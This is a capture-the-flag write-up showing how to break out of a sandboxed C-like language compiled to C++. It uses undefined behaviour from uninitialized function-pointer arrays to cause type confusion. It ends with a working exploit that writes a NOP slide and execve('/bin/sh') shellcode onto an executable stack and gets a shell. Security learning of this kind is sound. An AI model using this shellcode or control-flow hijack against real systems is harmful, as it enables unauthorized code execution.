- Original description
- The task
- The sandboxed language
- The attack surface
- Fun with undefined behaviour
- Solution
The DevMaster Sandboxed Programming Language: Creating unintentional bugs since 2019™
After our last disaster with a sandboxed build system, we've decided to pivot. We've created a sandboxed programming language with userland thread support. Why userland threads? Because they're fast! (Benchmark results pending.)
With this language, you can write code that's safe to run anywhere. Those executing your code can trust that it won't ever be able to read their precious ./flag files.
(Legal notice: 'can trust' may not be equivalent to 'should trust.' DevMaster Industries disclaims all liability resulting from running code written in the DevMaster Sandboxed Programming Language.)
The task is to write a source code in a somewhat C-like limited language, that will be run on the server, and escape the shackles of the language itself.
The "compiler" for this language is written using PEGTL, and translates sources written in the sandboxed language to C++, and then compiles that to the actual binary.
There were a few examples and a toolchain shellscript. E.g. one of these examples is array_conversion
:
def int32 main() {
array<int32, 4> arr;
arr[0] = 0;
arr[1] = 1;
arr[2] = 2;
arr[3] = 3;
int32 i = 0;
array<int32> dyn_arr = make_array<int32>(size(arr));
while (i < size(arr)) {
dyn_arr[i] = arr[i];
i = i + 1;
}
print(dyn_arr);
print("\n");
return 0;
}
Which is translated to:
// Intermediate representation, autogenerated.
#include "runtime.h"
int32 __attribute__ ((noinline)) sbt_main() {
{
fixed_array<int32, 4ULL> sbt_arr;
(sbt_arr).setitem(0ULL, (0ULL));
(sbt_arr).setitem(1ULL, (1ULL));
(sbt_arr).setitem(2ULL, (2ULL));
(sbt_arr).setitem(3ULL, (3ULL));
int32 sbt_i = 0ULL;
dynamic_array<int32> sbt_dyn_arr = (sbt_make_array<int32>((sbt_size(sbt_arr))));
while ((sbt_i) < ((sbt_size(sbt_arr)))) {
{
(sbt_dyn_arr).setitem(sbt_i, ((sbt_arr).getitem(sbt_i)));
sbt_i = ((sbt_i) + (1ULL));
}
}
(sbt_print(sbt_dyn_arr));
(sbt_print(make_string("\n")));
return (0ULL);
}
}
int main() {
std::cout << std::unitbuf;
std::cerr << std::unitbuf;
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
_exit(sbt_main());
}
It is then compiled by the script with the following flags: clang++ -O3 -g --std=c++17 -Werror=return-type -g -lpthread -z execstack -fno-stack-protector
. Imagine whatever meme you want here for the last two flags.
Then it is run, and gets the socket fd as stdin and stdout.
The language allows for simple operators, a limited set of simple types, simple functions, and most importantly, threads and function pointers. It provides an also limited set of library functions, and since all names are mangled, only these can be properly used. Simple types are implemented using C++ classes with overloaded operators, which are then exposed to the software:
template <typename T, size_t sz>
struct fixed_array {
std::array<T, sz> impl;
void setitem(size_t idx, T new_value) {
if (idx >= sz) {
exit_fail("Attempt to set field in fixed array of size " +
std::to_string(sz) + " with past-the-end index " +
std::to_string(idx));
}
impl[idx] = new_value;
}
T getitem(size_t idx) {
if (idx >= sz) {
exit_fail("Attempt to get field in fixed array of size " +
std::to_string(sz) + " with past-the-end index " +
std::to_string(idx));
}
return impl[idx];
}
size_t size() { return sz; }
};
The allowed types are:
- char (which is uint8_t), int32, int64, uint32, uint64: Which are wrapped in a class, implementing the atomic version of the simple int types.
- string, semaphore, thread: These are builtin types implemented as classes
- fixed_array and dynamic_array are templated classes
- ref is a templated reference type containing a shared_ptr
- func is a raw function pointer type
Some selected library functions:
- make_array, make_string, resize
- new, deref
- various tempalte specializations for print and hex to/from conversions
- make_thread, (semaphore) up, (semaphore) down, usleep
It looks like that there is a non-trivial userspace thread implementation for the whole thing, which I guess was supposed to be PWN-ed. This is not what I did, because it looked complicated.
I've looked at holes in the code generator.
At first, it looks pretty safe:
- Only very limited operator set
- Everything is quite properly typechekced, because all types are actually classes
- Array operations are "compiled" into their safe versions.
- The "library functions" looked bulletproof.
However, there was one extremely helpful comment in the language_docs.md about fixed arrays:
"fixed-size array on the stack will have its data members located on the stack"
How is that done? Looking at the runtime:
template <typename T, size_t sz>
struct fixed_array {
std::array<T, sz> impl;
...
A quick look at std:array's documentation on cppreference:
(constructor) (implicitly declared): initializes the array following the rules of aggregate initialization (note that default initialization may result in indeterminate values for non-class T)
Sounds good. Do we have any non-class Ts?
Unfortunately everything is wrapped in classes; even ints are wrapped into an atomic class, which does actually have a definite zero-initialization... except raw function pointers.
What happens when we use array<func<void>, 16>
? Things get weird...
So let's say our code is
def void uninitialized(){
array<func<void>, 16> x;
print(x[5]);
}
def int32 main() {
print("henlo wrodl\n");
uninitialized();
return 0;
}
When compiled, this turns into:
void __attribute__ ((noinline)) sbt_uninitialized() {
{
fixed_array<func<void>, 16ULL> sbt_x;
(sbt_print((sbt_x).getitem(5ULL)));
}
}
int32 __attribute__ ((noinline)) sbt_main() {
{
(sbt_print(make_string("henlo wrodl\n")));
(sbt_uninitialized());
return (0ULL);
}
}
int main() {
std::cout << std::unitbuf;
std::cerr << std::unitbuf;
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
_exit(sbt_main());
}
When ran, it produces the following output:
Henlo wrodl
func<0x11>func<0x11>func<0x11>
(functions have a specialized print function showing the address of the function)
Looks like we got junk, which is a good thing. But is it actually memory junk we can use? Doesn't look like it. Let's see the disassembly:
0000000000009000 <_Z17sbt_uninitializedv>:
9000: 50 push rax
9001: e8 ca 1c 00 00 call acd0 <_Z9sbt_printIvJEEvPFT_DpT0_E>
9006: e8 c5 1c 00 00 call acd0 <_Z9sbt_printIvJEEvPFT_DpT0_E>
900b: 58 pop rax
900c: e9 bf 1c 00 00 jmp acd0 <_Z9sbt_printIvJEEvPFT_DpT0_E>
Which is basically two calls to sbt_print<void>(void (*)())
, and then a tail call to it. The parameter setting is absolutely missing from the code. I guess clang detected the values were uninitialized and just decided to not even bother?
Let's see something a bit different:
def void dummy(){
}
def void uninitialized(){
array<func<void>, 16> x;
x[1] = dummy;
print(x[0]);
print(x[1]);
print(x[2]);
}
def int32 main() {
print("henlo wrodl\n");
uninitialized();
return 0;
}
This prints:
henlo wrodl
func<0x11>func<0x5634552f2000>func<0x7f6ba88ca4d0>
And the disassembly:
0000000000009010 <_Z17sbt_uninitializedv>:
9010: 50 push rax
9011: e8 ca 1c 00 00 call ace0 <_Z9sbt_printIvJEEvPFT_DpT0_E>
9016: 48 8d 3d e3 ff ff ff lea rdi,[rip+0xffffffffffffffe3] # 9000 <_Z9sbt_dummyv>
901d: e8 be 1c 00 00 call ace0 <_Z9sbt_printIvJEEvPFT_DpT0_E>
9022: 58 pop rax
9023: e9 b8 1c 00 00 jmp ace0 <_Z9sbt_printIvJEEvPFT_DpT0_E>
Huh. So clang actually tracks the array values individually.
Okay. What if we simply call one of these c̡̫͙̦̳͓̜̦̎̑̓̆ͣͫ͛o͖̰̻̬̗͓̟̽̀r̦͕̮̜̱͙̄ͯ̽̄̒̀̒͘r̜̙̹̰̪̼̤ͧͯ͐̔ͩ̂u̲̍ͧͬͬ̐͢p̮̲̥̠̬̔ͨͣ͂́ť͖͍̹͕ͦ͌ values?
def void dummy(){
}
def void uninitialized(){
array<func<void>, 16> x;
x[0]();
}
def int32 main() {
print("henlo wrodl\n");
uninitialized();
return 0;
}
It prints:
henlo wrodl
henlo wrodl
henlo wrodl
henlo wrodl
henlo wrodl
henlo wrodl
infinitely.
Wtf?? Looking at the symbol table, we see the following:
580: 0000000000009000 0 FUNC GLOBAL DEFAULT 14 _Z17sbt_uninitializedv
1205: 0000000000009000 282 FUNC GLOBAL DEFAULT 14 _Z8sbt_mainv
Clang didn't even try to generate any code this time. Without going into the details of other testing steps: this works with any function. We can give any apparent signature to any function
E.g.:
def void jump_on_me(array<char, 128> arr){
array<func<void>, 256> lel;
lel[0]();
print("Winning.");
}
def void dummy(func<void> f){
f();
}
Calling jump_on_me
will in fact call dummy
. Dummy expects a single function pointer as a parameter, but it will get a character array.
There is one tiny little roadblock though: clang is well aware that jump_on_me
is an a͍̗̬͠b̟̻̞͓̃̀ͥ̉̈s͕̲̞͕̙͓̄̋͗͐̍ͅo͙̻̩̼̒l͋͠u̵̠̮͔͓̭͉ͯ̐t̴͖̟̣̟̙͔ͨ̏̄͗͗̋͆e̥ͣͩͩl̮̣̳̼̈́ͧͥ̿ͨy̛̯͙ ̰͐̐̊̌ͅc̡̫͙̦̳͓̜̦̎̑̓̆ͣͫ͛o͖̰̻̬̗͓̟̽̀r̦͕̮̜̱͙̄ͯ̽̄̒̀̒͘r̜̙̹̰̪̼̤ͧͯ͐̔ͩ̂u̲̍ͧͬͬ̐͢p̮̲̥̠̬̔ͨͣ͂́ť͖͍̹͕ͦ͌ function, and will not even bother to actually set its parameters at the call site, so we need a bit of a trambouline:
def void jump_on_me(array<char, 128> arr){
array<func<void>, 256> lel;
lel[0]();
print("Winning.");
}
def void dummy(func<void> f){
f();
}
def void jump_help(array<char, 128> a){
jump_on_me(a);
}
def int32 main() {
array<char, 128> a;
a[0] = 144; a[1] = 144; a[2] = 144;
jump_help(a);
return 0;
}
This generates the following magnificent object code:
000000000008ff0 <_Z9sbt_dummyPFvvE>: ; Note that this is also the address of jump_on_me
8ff0: ff e7 jmp rdi
0000000000009000 <_Z13sbt_jump_help11fixed_arrayI14atomic_wrapperIhELm128EE>:
9000: 8a 07 mov al,BYTE PTR [rdi]
9002: 8a 47 01 mov al,BYTE PTR [rdi+0x1]
9005: 8a 47 02 mov al,BYTE PTR [rdi+0x2]
9008: 8a 47 03 mov al,BYTE PTR [rdi+0x3]
...
9179: 8a 47 7e mov al,BYTE PTR [rdi+0x7e]
917c: 8a 47 7f mov al,BYTE PTR [rdi+0x7f]
917f: e9 6c fe ff ff jmp 8ff0 <_Z9sbt_dummyPFvvE> ; Note how rdi never gets set
0000000000009190 <_Z8sbt_mainv>:
...
91c5: b0 90 mov al,0x90
91c7: b1 90 mov cl,0x90
91c9: 86 0c 24 xchg BYTE PTR [rsp],cl
91cc: b1 90 mov cl,0x90
91ce: 86 4c 24 01 xchg BYTE PTR [rsp+0x1],cl
91d2: 86 44 24 02 xchg BYTE PTR [rsp+0x2],al
...
9212: 48 8d bc 24 80 00 00 lea rdi,[rsp+0x80] ; This is the RDI set we will actually use
9219: 00
921a: e8 e1 fd ff ff call 9000 <_Z13sbt_jump_help11fixed_arrayI14atomic_wrapperIhELm128EE>
Okay. We have proper type confusion. What now? Remember -z execstack
? Yeah, we might as well just paste our favourite execve('/bin/sh')
shellcode into the array, with a NOP slide for safety, and get a shell.
def void jump_on_me(array<char, 128> arr){
array<func<void>, 256> lel;
lel[0]();
print("Winning.");
}
def void dummy(func<void> f){
f();
}
def void jump_help(array<char, 128> a){
jump_on_me(a);
}
def int32 main() {
array<char, 128> a;
a[0] = 144; a[1] = 144; a[2] = 144;
a[3] = 144; a[4] = 144; a[5] = 144; a[6] = 144; a[7] = 144; a[8] = 144; a[9] = 144; a[10] = 144; a[11] = 144; a[12] = 144; a[13] = 144; a[14] = 144; a[15] = 144; a[16] = 144; a[17] = 144; a[18] = 144; a[19] = 144; a[20] = 144; a[21] = 144; a[22] = 144; a[23] = 144; a[24] = 144; a[25] = 144; a[26] = 144; a[27] = 144; a[28] = 144; a[29] = 144; a[30] = 144; a[31] = 144; a[32] = 144; a[33] = 144; a[34] = 144; a[35] = 144; a[36] = 144; a[37] = 144; a[38] = 144; a[39] = 144; a[40] = 144; a[41] = 144; a[42] = 144; a[43] = 144; a[44] = 144; a[45] = 144; a[46] = 144; a[47] = 144; a[48] = 144; a[49] = 144; a[50] = 144; a[51] = 144; a[52] = 144; a[53] = 144; a[54] = 144; a[55] = 144; a[56] = 144; a[57] = 144; a[58] = 144; a[59] = 144; a[60] = 144; a[61] = 144; a[62] = 144; a[63] = 144;
a[64] = 80;
a[65] = 72;a[66] = 49;a[67] = 210;a[68] = 72;a[69] = 49;a[70] = 246;a[71] = 72;a[72] = 187;a[73] = 47;a[74] = 98;a[75] = 105;a[76] = 110;a[77] = 47;a[78] = 47;a[79] = 115;a[80] = 104;a[81] = 83;a[82] = 84;a[83] = 95;a[84] = 176;a[85] = 59;a[86] = 15;a[87] = 5;
jump_help(a);
return 0;
}
With shell, we can just do a cat flag
, and the flag is CTF{This-challenge-was-very-hard}
.
(Note: the original solution used a thread to get an executable mapped stack, but turns out it is not needed because of that weird gcc flag)
Even though this solution was unintended, I absolutely loved tinkering with undefined behaviours, so it's all good. Looking at other writeups I guess this was as hard as any other solution.